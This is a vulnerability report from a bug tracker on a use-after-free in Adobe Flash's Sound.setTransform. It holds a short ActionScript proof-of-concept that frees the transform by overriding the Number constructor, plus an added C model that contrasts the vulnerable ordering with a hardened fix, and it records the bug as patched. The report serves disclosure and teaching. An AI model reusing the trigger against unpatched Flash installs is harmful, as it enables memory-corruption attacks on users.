Status: Fixed
Closed: Mar 2016
Adobe Flash: Use-after-free in Sound.setTransform (2)
Project Member Reported by natashenka@google.com, Dec 18 2015
There is a use-after-free in Sound.setTransform, similar to the one reported in issue 568 (CVE-2015-8434). If the transform object provided is an integer primitive, and the Number constructor is overwritten, this constructor will be executed and can free the internal sound transform, which is then written to. A minimal proof-of-concept is as follows:

this.createEmptyMovieClip("my_mc", 1);
var my_sound:Sound = new Sound("my_mc");
_global.Number = func;          // the integer passed to setTransform below is boxed through this constructor
my_sound.attachSound("world");
my_sound.setTransform(7);       // integer primitive instead of a transform object
my_sound.start();

function func() {
    my_mc.removeMovieClip();    // frees the sound's internal transform, which setTransform then writes to
    this.ll = 7;                // actually construct a transform
    this.lr = 7;
    this.rl = 7;
    this.rr = 7;
}

A PoC is attached. This PoC demonstrates the bug by allocating a new transform in the place of the freed one, and reading the values that get overwritten. The test fails (Flash is vulnerable) if the number written to the screen is 9999. The test passes if any other value is written. There are roughly 600 object types in Flash that are the same size as the object that is used after it is freed, so I suspect this issue is exploitable with enough effort.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachments:
soundtransform.fla (236 KB)
soundtransform.swf (85.3 KB)
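The bug class in the report above is a re-entrancy use-after-free: native code caches a raw pointer to the sound transform, then performs an argument coercion that can run attacker-controlled script (the overridden Number constructor), and finally writes through the cached pointer after the script has released the object. The following C model is an added example, not code from the report and not Adobe's Flash source; the struct layout, the function names, the instrumented `released` flag (used instead of a real free() so the test has no undefined behaviour) and the "run script-reachable work first, then re-fetch the owner's pointer" fix are all assumptions for illustration. The page does not say how Adobe fixed CVE-2016-0987.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Native-side transform object that Sound.setTransform writes into (modelled, not Flash's layout). */
typedef struct {
    int ll, lr, rl, rr;
    int released;   /* instrumentation: set when the owner drops it (stand-in for free()) */
} SoundTransform;

/* The Sound owns its transform; removing the MovieClip it is attached to releases it. */
typedef struct {
    SoundTransform *xform;
} Sound;

/* Plain object produced by coercing the setTransform argument. */
typedef struct { int ll, lr, rl, rr; } TransformObj;

/* Hook standing in for the script-overridable _global.Number constructor. */
typedef void (*number_ctor_t)(Sound *owner);
static number_ctor_t g_number_ctor = NULL;

/* What the PoC's func() does: my_mc.removeMovieClip(), which releases the transform. */
static void poc_number_ctor(Sound *owner) {
    if (owner->xform) {
        owner->xform->released = 1;  /* instrumented instead of free() so reading it later is not UB */
        owner->xform = NULL;
    }
}

/* Boxing an integer primitive invokes the (possibly overridden) Number constructor. */
static TransformObj coerce_to_object(int primitive, Sound *owner) {
    if (g_number_ctor) g_number_ctor(owner);  /* attacker's script runs here */
    TransformObj o = { primitive, primitive, primitive, primitive };
    return o;
}

/* Vulnerable ordering: the raw transform pointer is cached before any script can run and
 * written through afterwards. Returns 1 if the write landed on a released object,
 * 0 if the object was still live, -1 if there was no transform at all. */
int set_transform_vulnerable(Sound *s, int arg) {
    SoundTransform *t = s->xform;               /* (1) raw pointer cached */
    if (!t) return -1;
    TransformObj o = coerce_to_object(arg, s);  /* (2) script may release *t */
    int stale = t->released;                    /* (3) write through the cached pointer */
    t->ll = o.ll; t->lr = o.lr; t->rl = o.rl; t->rr = o.rr;
    return stale;
}

/* Hardened ordering: perform every script-reachable step first, then re-read the owner's
 * current pointer and refuse if the object went away. Returns 0 on success, -1 if refused. */
int set_transform_hardened(Sound *s, int arg) {
    TransformObj o = coerce_to_object(arg, s);  /* script runs before we hold any pointer */
    SoundTransform *t = s->xform;               /* re-fetch after the script ran */
    if (!t) return -1;                          /* clip removed during coercion: bail out */
    t->ll = o.ll; t->lr = o.lr; t->rl = o.rl; t->rr = o.rr;
    return 0;
}

/* Drive one implementation through the PoC sequence (attach, optionally override Number, setTransform(7)). */
int run_poc(int (*set_transform)(Sound *, int), int override_number) {
    Sound s;
    SoundTransform *alloc = calloc(1, sizeof *alloc);
    if (!alloc) return -2;
    s.xform = alloc;
    g_number_ctor = override_number ? poc_number_ctor : NULL;
    int result = set_transform(&s, 7);
    g_number_ctor = NULL;
    free(alloc);   /* the owner may have dropped its pointer; free via the saved one */
    return result;
}

int main(void) {
    printf("vulnerable, Number untouched:   %d\n", run_poc(set_transform_vulnerable, 0));
    printf("vulnerable, Number overridden:  %d (1 = wrote to released transform)\n",
           run_poc(set_transform_vulnerable, 1));
    printf("hardened,   Number overridden:  %d (-1 = refused, no write)\n",
           run_poc(set_transform_hardened, 1));
    return 0;
}
```

The model reproduces the ordering that matters: in `set_transform_vulnerable` the callback runs between taking the pointer and using it, which is exactly the window the PoC's `func()` exploits with `removeMovieClip()`. The hardened variant closes the window by doing all coercion (and therefore all script execution) before touching the native object, and by treating "the object disappeared while script ran" as an error rather than a fact to be ignored. Holding a strong reference across the call would be the other standard fix; either way, no raw pointer may survive a call into script.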
Project Member Comment 1 by natashenka@google.com, Mar 22 2016
Labels: -Restrict-View-Commit CVE-2016-0987
Status: Fixed
Fixed in March update